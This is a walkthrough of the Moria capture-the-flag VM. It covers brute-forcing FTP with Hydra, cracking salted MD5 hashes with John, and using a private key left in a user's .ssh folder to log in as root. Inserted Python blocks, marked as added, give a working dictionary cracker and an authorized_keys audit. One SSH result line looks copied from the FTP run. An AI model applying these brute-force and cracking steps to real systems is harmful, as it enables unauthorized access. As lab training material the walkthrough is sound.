Moria CTF VM — Vulnhub.com

Andrew Hilton
12 min read, May 23, 2017


It’s been a while since I’ve done any Vulnhub VMs due to other things taking up my time (keep a look out for a future post explaining what’s been taking up my time). But for this post I am walking through an awesome VM I was beta testing for abatchy. Mate, you created a truly fun VM. Great work!! OK, so let’s jump straight in.

After finding the IP address of the VM, let’s run an nmap scan against it.

┌─[root@parrot]─[/home/andrew]
└──╼ #nmap 192.168.1.181 -p- -sV

Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-25 17:04 GMT
Nmap scan report for Moria.home (192.168.1.181)
Host is up (0.00045s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
MAC Address: 00:0C:29:75:EC:A1 (VMware)

Cool, so we’ve got a few ports open: an FTP, an SSH and an HTTP port. Let’s jump straight in and take a look at the web page on the HTTP port.

Wow, OK, so it seems like a medieval image of some kind. Googling the text from the image

Ennyn Durin Aran Moria. Pedo Mellon a Minno. Im Narvi hainechant. Celebrimbor o Eregion teithant i thiw hin.

Brings me to a wiki page that gives me the translation as:

The Doors of Durin, Lord of Moria. Speak, friend, and enter. I, Narvi, made them. Celebrimbor of Hollin drew these signs.

(On further reading of the wiki page, it mentions that the phrase actually has the password in it that would make the doors open:
“Gandalf’s translation is correct, but the proper translation of the second sentence, also correct, is ‘Say “friend” and enter.’”)

Cool, so if we take the clue from the film then we have a password of friend or Mellon (which is the Sindarin word for friend) and a possible username of Gandalf:

Gandalf : friend
Gandalf : Mellon

It could also be giving me another username, Narvi (the creator of the doors):

Narvi : friend
Narvi : Mellon

The source code gives me the name of the image and that’s it, haha.
So OK, I now know the image shows the “Gates of Moria”.

Let’s download it and see if the image holds any clues using strings or exiftool etc.

Neither of them, nor running identify -verbose, returned anything at all. I’m going to run Sparta against it and see if it can uncover anything at all!

So again not much returned at all at first glance, apart from maybe these points that are worth looking into.

+ Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ PHP/5.4.16 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST

I’ll make a note of these and move on to checking the other ports; I’m guessing that I’ll have to come back to the HTTP port at some point moving forward.

So let’s take a look at the FTP port; it’s running vsftpd 2.0.8.
Using curl with --ftp-account DATA against the VM gives me

┌─[✗]─[root@parrot]─[/home/andrew]
└──╼ #curl --ftp-account DATA 192.168.1.181:21
220 Welcome Balrog!
530 Please login with USER and PASS.
530 Please login with USER and PASS.
530 Please login with USER and PASS.
530 Please login with USER and PASS.

OK, this feels like a step forward. A quick Google to find out who Balrog is turns up that he’s a creature who appears in LOTR, helping to confirm I’m on the right path.
Reading the wiki page for Balrogs tells me that the first one introduced in the story is called Durin’s Bane, who they encounter in the mines of MORIA. :-) Another good sign.
Time to grab a coffee and read up a little on Durin’s Bane and see if I can get any clues as to a username and password from his wiki page.

I decided to use the wiki passage to create a custom word list to use with DIRB, so after a quick Google to find out the best way to do that I found a page http://tinyurl.com/mnr4zxh which gave me the exact thing I was looking for. So using the command

┌─[root@parrot]─[/home/andrew/Desktop/VulnHub Challenges/Moria]
└──╼ #tr -sc '[A-Z][a-z]' '[\012*]' < Durins\ Bane\ Notes\ from\ Wikipedia | sort | uniq > durins\ wordlist

(This reads the notes file, puts each word on its own line, sorts the words alphabetically, removes any duplicates and saves the result as the wordlist file.)

This is exactly what I needed and gives me a really nice word list to use with Dirb.

So let’s see if we get any hits back on the HTTP 80 port.

┌─[✗]─[root@parrot]─[/home/andrew/Desktop/VulnHub Challenges/Moria]
└──╼ #dirb http://192.168.1.181/ durinswordlist

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Mar 25 18:39:00 2017
URL_BASE: http://192.168.1.181/
WORDLIST_FILES: durinswordlist

-----------------

GENERATED WORDS: 360
---- Scanning URL: http://192.168.1.181/ ----
-----------------
END_TIME: Sat Mar 25 18:39:01 2017
DOWNLOADED: 360 - FOUND: 0

Arggghhhh, come on, I really thought that would get at least one hit!! OK, what now?? Robots.txt? Nope!!

OK, let’s go back to basics and just run DirBuster on the site using the standard word list.

Cool, at last a step forward: it looks like it found a nested dir at http://192.168.1.181/w/h/i/s/p/e/r/the_abyss/

Let’s see what it’s got to hide.

OK, so it brings me to a page that simply has text on it. I tried to reload it and to my surprise the text changed. Here are all the lines it showed me when I repeatedly reloaded.

Balin: “Be quiet, the Balrog will hear you!”
Ori: “Will anyone hear us?”
“We will die here..”
“Too loud!”
“Eru! Save us!”
“Knock knock”
Fundin: “That human will never save us!”
Telchar to Thrain: “That human is slow, don’t give up yet”
Oin: “Stop knocking!”
Maeglin: “The Balrog is not around, hurry!”
Nain: “Will the human get the message?”
Dain: “Is that human deaf? Why is it not listening?”
“Is this the end?”

It just seems to keep going on and on. I was looking at each page’s source code and they are all just text. OK, I need to think about what is going on here; I must be missing something.

Looking at the lines above, some of them could be usernames and passwords, as in:

Balin: “Be quiet, the Balrog will hear you!”
Ori: “Will anyone hear us?”
Fundin: “That human will never save us!”
Oin: “Stop knocking!”
Maeglin: “The Balrog is not around, hurry!”
Nain: “Will the human get the message?”
Dain: “Is that human deaf? Why is it not listening?”

At this point it’s worth a try, so I went about creating custom username and password lists using all of the names I had found so far and ran them through Hydra with the following results

┌─[✗]─[root@parrot]─[/home/andrew/Desktop/VulnHub Challenges/Moria]
└──╼ #hydra -L usernames -P passwords ftp://192.168.1.181
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-03-25 20:09:16
[DATA] max 16 tasks per 1 server, overall 64 tasks, 744 login tries (l:24/p:31), ~0 tries per task
[DATA] attacking service ftp on port 21
[STATUS] 83.00 tries/min, 83 tries in 00:01h, 680 to do in 00:09h, 16 active
[STATUS] 58.00 tries/min, 174 tries in 00:03h, 680 to do in 00:12h, 16 active
[STATUS] 52.43 tries/min, 367 tries in 00:07h, 506 to do in 00:10h, 16 active
[STATUS] 50.42 tries/min, 605 tries in 00:12h, 268 to do in 00:06h, 16 active
[STATUS] 49.41 tries/min, 840 tries in 00:17h, 33 to do in 00:01h, 16 active
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-03-25 20:26:47
┌─[root@parrot]─[/home/andrew/Desktop/VulnHub Challenges/Moria]
└──╼ #hydra -L usernames -P passwords ssh://192.168.1.181
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-03-25 20:29:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 744 login tries (l:24/p:31), ~0 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 137.00 tries/min, 137 tries in 00:01h, 697 to do in 00:06h, 16 active
[STATUS] 138.67 tries/min, 416 tries in 00:03h, 457 to do in 00:04h, 16 active
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-03-25 20:35:59

Damn, the two lines from above that I didn’t want to see were

1 of 1 target completed, 0 valid passwords found
1 of 1 target completed, 0 valid passwords found

OK, I think I’m really stuck now. I’m going to go back through my notes and see if I’ve missed anything.

After reading back through my notes I remembered that when I curl’d the FTP port at the start I got

┌─[✗]─[root@parrot]─[/home/andrew]
└──╼ #curl --ftp-account DATA 192.168.1.181:21
220 Welcome Balrog!

So let’s run Hydra again, but this time using the username Balrog and my custom password list.

┌─[✗]─[root@parrot]─[/home/andrew/Desktop/VulnHub Challenges/Moria]
└──╼ #hydra -l Balrog -P passwords ftp://192.168.1.181
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-03-27 12:05:49
[DATA] max 16 tasks per 1 server, overall 64 tasks, 31 login tries (l:1/p:31), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.181 login: Balrog password: Mellon
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-03-27 12:05:54

YES!! I was right earlier when I thought it could be Friend or Mellon:

[21][ftp] host: 192.168.1.181 login: Balrog password: Mellon

(INTERESTINGLY I HAD BOTH OF THOSE IN MY CUSTOM USERNAME AND PASSWORD LISTS, NOT SURE WHY IT DIDN’T PICK THEM UP)
I’ll make a note to ask the question in the WhiteHatters Academy Forum and see if it’s something I did wrong.

Let’s check the SSH port with the same username and password list.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-03-27 12:05:49
[DATA] max 16 tasks per 1 server, overall 64 tasks, 31 login tries (l:1/p:31), ~0 tries per task
[DATA] attacking service ssh on port 22
[21][ftp] host: 192.168.1.181 login: Balrog password: Mellon
1 of 1 target successfully completed, 1 valid password found

Awesome, so now we have the login creds for the FTP and SSH ports.

Let’s try to connect to the SSH port first.

┌─[✗]─[root@parrot]─[/home/andrew]
└──╼ #ssh Balrog@192.168.1.181
Balrog@192.168.1.181’s password:
Last failed login: Mon Mar 27 07:06:47 EDT 2017 from 192.168.1.161 on ssh:notty
There were 17 failed login attempts since the last successful login.
Last login: Sun Mar 12 22:39:59 2017

WRONG GATE!

Connection to 192.168.1.181 closed.

Hmmmm OK, so a step forward and then another wall: it’s the wrong gate!! Let’s follow this trail for a bit; back to Google, I think, to see if there is in fact another gate referenced in the story.

There is a second gate referenced in the story called the Great Gates; this was in fact the main entrance to Moria, and the Doors of Durin were the side entrance.

OK, so what to do with this info (I HAVE NO IDEA AT THIS POINT). I’ll make a note of it and move on to logging into the FTP.

After logging in and taking a little look around without finding anything juicy at all, I moved to the /var/www/html dir and found a folder /QlVraKW4fbIkXau9zkAPNGzviT3UKntl/ listed.
Nice, this feels like I’m going in the right direction again. Let’s jump over to Firefox and see what the page holds.

Bingo, this is looking better. OK, so it’s a list of “Prisoners” and their passkeys!!
Looking at the source code of the page gives me another clue too.

So let’s put them together and do a bit of formatting in order to use them with john:

Balin:c2d8960157fc8540f6d5d66594e165e0$6MAp84
Oin:727a279d913fba677c490102b135e51e$bQkChe
Ori:8c3c3152a5c64ffb683d78efc3520114$HnqeN4
Maeglin:6ba94d6322f53f30aca4f34960203703$e5ad5s
Fundin:c789ec9fae1cd07adfc02930a39486a1$g9Wxv7$
Nain:fec21f5c7dcf8e5e54537cfda92df5fe$HCCsxP
Dain:6a113db1fd25c5501ec3a5936d817c29$cC5nTr
Thrain:7db5040c351237e8332bfbba757a1019$h8spZR
Telchar:dd272382909a4f51163c77da6356cc6f$tb9AWe

— (IT WAS THIS SECTION, THE FORMATTING, THAT STUMPED ME FOR SOOOO LONG. I THINK ALL IN ALL I SPENT A FEW WEEKS ON THIS TASK ON AND OFF!!) —

Let’s save it as a file called moriapasswords.txt and load it into john using the option -format=dynamic_6

┌─[root@parrot]─[/home/andrew/Desktop/VulnHub/Moria]
└──╼ #john -form=dynamic_6 moriapasswords.txt
Using default input encoding: UTF-8
Loaded 9 password hashes with 9 different salts (dynamic_6 [md5(md5($p).$s) 128/128 AVX 4x3])
Remaining 8 password hashes with 8 different salts
Press 'q' or Ctrl-C to abort, almost any other key for status
flower (Balin)
rainbow (Oin)
spanky (Ori)
fuckoff (Maeglin)
warrior (Nain)
abcdef (Dain)
magic (Telchar)
darkness (Thrain)
hunter2 (Fundin)
Use the "--show" option to display all of the cracked passwords reliably
Session completed
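The hash format that caused the trouble above, as an added example that is not part of the original post or the VM: john’s dynamic_6 is md5(md5($p).$s), and each input line is user:hash$salt. The block parses that format, recomputes the digest for candidate words, and shows why the scheme falls so quickly (the inner md5($p) is salt-independent, so it is computed once per word); the sample users, salts and passwords are constructed, not the VM’s.

```python
import hashlib


def dynamic6(password: str, salt: str) -> str:
    """john's dynamic_6 scheme: md5(md5($p).$s), both digests as lowercase hex."""
    inner = hashlib.md5(password.encode("utf-8")).hexdigest()
    return hashlib.md5((inner + salt).encode("utf-8")).hexdigest()


def parse_line(line: str):
    """Parse one 'user:hash$salt' line into (user, hash, salt).

    The split on '$' is limited to one, so a salt that itself ends in '$'
    (like the Fundin entry above) is kept whole rather than truncated.
    """
    user, rest = line.strip().split(":", 1)
    digest, salt = rest.split("$", 1)
    return user, digest.lower(), salt


def recover(lines, wordlist):
    """Return {user: password} for every entry matched by a word in the list.

    Because md5($p) does not depend on the salt it is computed once per
    candidate and reused for every entry; each (word, entry) pair then costs
    a single extra MD5, which is why john finished the list above in seconds.
    A slow, salted password hash (bcrypt, scrypt, Argon2) removes that shortcut.
    """
    inner = {w: hashlib.md5(w.encode("utf-8")).hexdigest() for w in wordlist}
    found = {}
    for line in lines:
        user, digest, salt = parse_line(line)
        for word, h in inner.items():
            if hashlib.md5((h + salt).encode("utf-8")).hexdigest() == digest:
                found[user] = word
                break
    return found


# Constructed sample entries (not from the VM), built with dynamic6 so the
# expected result is known in advance.
SAMPLE = [
    "Gimli:" + dynamic6("axe", "Q1wX9z") + "$Q1wX9z",
    "Gloin:" + dynamic6("hunter2", "g9Wxv7$") + "$g9Wxv7$",  # salt ending in '$'
    "Bombur:" + dynamic6("not-in-list", "abc123") + "$abc123",
]
WORDLIST = ["flower", "axe", "rainbow", "hunter2"]

if __name__ == "__main__":
    print(recover(SAMPLE, WORDLIST))  # {'Gimli': 'axe', 'Gloin': 'hunter2'}
```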

Cool, so now we have some usernames and their cracked passwords; let’s see if we can use them to log into the SSH port.

┌─[root@parrot]─[/home/andrew]
└──╼ #ssh balin@192.168.1.181
balin@192.168.1.181’s password:
Permission denied, please try again.
balin@192.168.1.181’s password:

┌─[✗]─[root@parrot]─[/home/andrew]
└──╼ #ssh Balin@192.168.1.181
Balin@192.168.1.181’s password:
Permission denied, please try again.
Balin@192.168.1.181’s password:

┌─[✗]─[root@parrot]─[/home/andrew]
└──╼ #ssh oin@192.168.1.181
oin@192.168.1.181’s password:
Permission denied, please try again.
oin@192.168.1.181’s password:

┌─[✗]─[root@parrot]─[/home/andrew]
└──╼ #ssh Oin@192.168.1.181
Oin@192.168.1.181’s password:
Permission denied, please try again.
Oin@192.168.1.181’s password:

┌─[✗]─[root@parrot]─[/home/andrew]
└──╼ #ssh ori@192.168.1.181
ori@192.168.1.181’s password:
Permission denied, please try again.
ori@192.168.1.181’s password:

┌─[✗]─[root@parrot]─[/home/andrew]
└──╼ #ssh Ori@192.168.1.181
Ori@192.168.1.181’s password:
Last login: Tue May 23 07:32:12 2017 from 192.168.1.182
-bash-4.2$

AWESOME!! We’re in. Let’s make this a real shell and then carry on enumerating the box.

┌─[✗]─[root@parrot]─[/home/andrew]
└──╼ #ssh Ori@192.168.1.181
Ori@192.168.1.181’s password:
Last login: Tue May 23 07:32:12 2017 from 192.168.1.182
-bash-4.2$ python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$ ls
poem.txt

bash-4.2$ cat poem.txt
Ho! Ho! Ho! to the bottle I go
To heal my heart and drown my woe.
Rain may fall and wind may blow,
And many miles be still to go,
But under a tall tree I will lie,
And let the clouds go sailing by.

PS: Moria will not fall!

That’s a nice little poem but I don’t really understand what it means at the moment. I’ll make a note of it and let’s move on.

bash-4.2$ ls -la
total 8
drwx------  3 Ori  notBalrog  55 Mar 12 22:57 .
drwxr-x---. 4 root notBalrog  32 Mar 14 00:36 ..
-rw-------  1 Ori  notBalrog   6 May 23 07:32 .bash_history
-rw-r--r--  1 root root      225 Mar 13 23:53 poem.txt
drwx------  2 Ori  notBalrog  57 Mar 12 22:57 .ssh

Let’s check out the other folders on the box.

bash-4.2$ cat .bash_history

exit

HMMM OK, an empty bash_history. Let’s carry on!

bash-4.2$ cd .ssh/

bash-4.2$ ls
id_rsa id_rsa.pub known_hosts

bash-4.2$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAu+OTcbouwWKZ6JRYBJXSIp9c8N/+w/0R7A0s5K1Kj45FBhpA
k0U/eZJIcpZZYUu9a5yfEZFnlUHshVjD12KTvvANIfvTalP0+uGrOSlF/b1tt8Ol

**** output snipped to stop you having to scroll endlessly ****
-----END RSA PRIVATE KEY-----

bash-4.2$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC745Nxui7BYpnolFgEldIin1zw3/7D/RHsDSzkrUqPjkUGGkCTRT95kkhylllhS71rnJ8RkWeVQeyFWMPXYpO+8A0h+9NqU/T64as5KUX9vW23w6VVBbxuC8AlcaibzzVuxSe7mvgFenRLkcihERLaT0EeQ/tmaSGScLzcP7NOWf/a4e8f+mIDnHdoUoPPc3O8lA0SOf9T2mK+WMBVWu5drRMNgOeN7Gxm0bcK2x719CWPuyqyiyqZTZpcS7TdH+gc36OUyfbCgqJGdR2gI1o17n+VhLuV4xwyXwAjuEQyAldK50EYLIu7MO9tCBGLd04UCzvZhK4b920w2igQcuvh Ori@Prison

bash-4.2$ cat known_hosts
127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0=

Let’s try and connect back to the local host using the id_rsa file.

bash-4.2$ ssh -i id_rsa root@127.0.0.1
Last login: Tue Mar 14 23:56:24 2017
[root@Moria ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@Moria ~]#

Wow, that was a really cool way of rooting the box; I’ve never seen that before in a VM. Let’s see if we can find the flag now that we are root on the box.
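A defender’s view of the trust path just used, as an added example that is not from the original post or the VM: the only thing that made Ori’s key a root key was a line in root’s authorized_keys matching Ori’s id_rsa.pub. The block compares the public halves of keys found in users’ ~/.ssh with a target account’s authorized_keys and reports every user whose key that account would accept; all key blobs and comments are constructed placeholders, and an options field containing quoted spaces is not handled.

```python
from typing import Dict, Optional, Set, Tuple

# Key-type prefixes sshd recognises at the start of a key entry.
KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-", "sk-")


def pubkey_identity(line: str) -> Optional[Tuple[str, str]]:
    """Reduce a public-key or authorized_keys line to (keytype, base64 blob).

    The trailing comment ('Ori@Prison') and any leading options field such
    as 'command="..."' are not part of what sshd matches on, so both are
    dropped. Assumption: the options field contains no quoted spaces.
    """
    tokens = line.strip().split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.startswith(KEY_TYPES):
            return tok, tokens[i + 1]
    return None


def keys_accepted_by(authorized_keys: str) -> Set[Tuple[str, str]]:
    """Every key identity the target account's authorized_keys would accept."""
    accepted = set()
    for line in authorized_keys.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        ident = pubkey_identity(line)
        if ident:
            accepted.add(ident)
    return accepted


def users_with_access(authorized_keys: str, user_pubkeys: Dict[str, str]) -> Dict[str, str]:
    """Map user -> key type for each user whose ~/.ssh public key would log in
    as the target account. On the VM above this check would flag Ori -> root.
    Keys carrying restrictive options (command=, no-pty) are still reported:
    the trust exists, the options only limit what the session can do."""
    accepted = keys_accepted_by(authorized_keys)
    hits = {}
    for user, pub in user_pubkeys.items():
        ident = pubkey_identity(pub)
        if ident and ident in accepted:
            hits[user] = ident[0]
    return hits


# Constructed sample data: fake key blobs, not the VM's real keys.
ROOT_AUTHORIZED_KEYS = """\
# root's authorized_keys (constructed)
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0fake0ri0key0000 Ori@Prison
no-pty,command="/bin/false" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIfakebackupkey backup@Moria
"""
USER_PUBKEYS = {
    "Ori": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0fake0ri0key0000 Ori@Prison",
    "Balrog": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0fakebalrogkey00 Balrog@Moria",
    "backup": "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIfakebackupkey backup@Moria",
}

if __name__ == "__main__":
    print(users_with_access(ROOT_AUTHORIZED_KEYS, USER_PUBKEYS))
    # {'Ori': 'ssh-rsa', 'backup': 'ssh-ed25519'}
```

In a real audit the USER_PUBKEYS map would be built by reading each home directory’s ~/.ssh/*.pub (or by running ssh-keygen -y on private keys found there), and any hit against root’s authorized_keys is a privilege-escalation path worth removing or at least restricting with a forced command and `from=` clause.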

[root@Moria ~]# find / -name "*flag*"
/proc/sys/kernel/acpi_video_flags
/proc/kpageflags
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/ens33/flags
/sys/devices/system/cpu/cpu0/microcode/processor_flags
/sys/devices/virtual/net/lo/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/kernel/debug/tracing/events/xfs/xfs_attr_leaf_clearflag
/sys/kernel/debug/tracing/events/xfs/xfs_attr_leaf_setflag
/sys/kernel/debug/tracing/events/xfs/xfs_attr_leaf_flipflags
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/module/scsi_mod/parameters/default_dev_flags
/root/flag.txt
/usr/lib64/samba/libflag-mapping-samba4.so
/usr/lib64/perl5/bits/waitflags.ph

We can see that we have found the flag.txt file listed in the root dir.

[root@Moria ~]# cat /root/flag.txt

“All that is gold does not glitter,
Not all those who wander are lost;
The old that is strong does not wither,
Deep roots are not reached by the frost.

From the ashes a fire shall be woken,
A light from the shadows shall spring;
Renewed shall be blade that was broken,
The crownless again shall be king.”

All That is Gold Does Not Glitter by J. R. R. Tolkien

I hope you suff.. enjoyed this VM. It wasn’t so hard, was it?
-Abatchy

Huge thanks to @abatchy for letting me beta test this VM! I got stuck for a long time trying to find the correct format for the john cracking section, but after trying A LOT of different variants I finally got there. Huge thanks for creating such an awesome VM.

I’ll look forward to more from you in the future.

Tactical Threat Manager @ FinTech | Purple Team | Offensive Operations